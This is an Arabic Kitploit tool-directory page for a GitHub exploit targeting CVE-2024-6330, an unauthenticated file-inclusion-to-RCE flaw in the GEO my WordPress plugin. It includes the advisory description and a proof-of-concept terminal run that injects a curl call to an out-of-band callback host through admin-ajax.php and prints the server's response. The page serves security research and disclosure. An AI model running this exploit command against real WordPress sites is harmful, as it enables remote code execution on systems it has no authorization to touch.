Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-6330
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubrandomrobbiebf/cve-2024-6330

CVE-2024-6330

GEO my WordPress < 4.5.0.2 - استغلال LFI غير مصادق عليه إلى RCE/PHAR Deserialization

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-6330

GEO my WordPress <= 4.5.0.1 - تضمين ملف محلي غير موثَّق

الوصف

إضافة GEO my WP لووردبريس معرضة لتضمين ملف محلي في جميع الإصدارات حتى 4.5.0.1 بما في ذلك عبر المعامل 'form[info_window_template][content_path]'. وهذا يُمكّن المهاجمين غير الموثَّقين من تضمين وتنفيذ ملفات عشوائية على الخادم، مما يسمح بتنفيذ أي كود PHP في تلك الملفات. يمكن استخدام هذا لتجاوز ضوابط الوصول، أو الحصول على بيانات حساسة، أو تحقيق تنفيذ كود في حالات يمكن فيها رفع وتضمين الصور وأنواع ملفات "آمنة" أخرى.

التفاصيل

  • النوع: إضافة
  • المعرف: geo-my-wp
  • الإصدار المتأثر: 4.5.0.1
  • درجة CVSS: 9.8
  • تصنيف CVSS: حرج
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-6330
  • الحالة: نشط

إثبات المفهوم

root@kitploit:~
python3 CVE-2024-6330.py --url https://wp-dev.ddev.site --proxy http://127.0.0.1:8080 --execute="curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site"
[*] Starting security test...
[*] Initial visit to https://wp-dev.ddev.site: 200

[+] Testing object_id: 1
[+] URL: https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=gmw_info_window_init&0=echo%20Command%20Output:%20$(curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site)
[+] Status Code: 200
[+] Response Content:
Command Output: <html><body>ivv900fnzbln0dem43z7zmzjjgigz</body></html>
تنزيل الأداة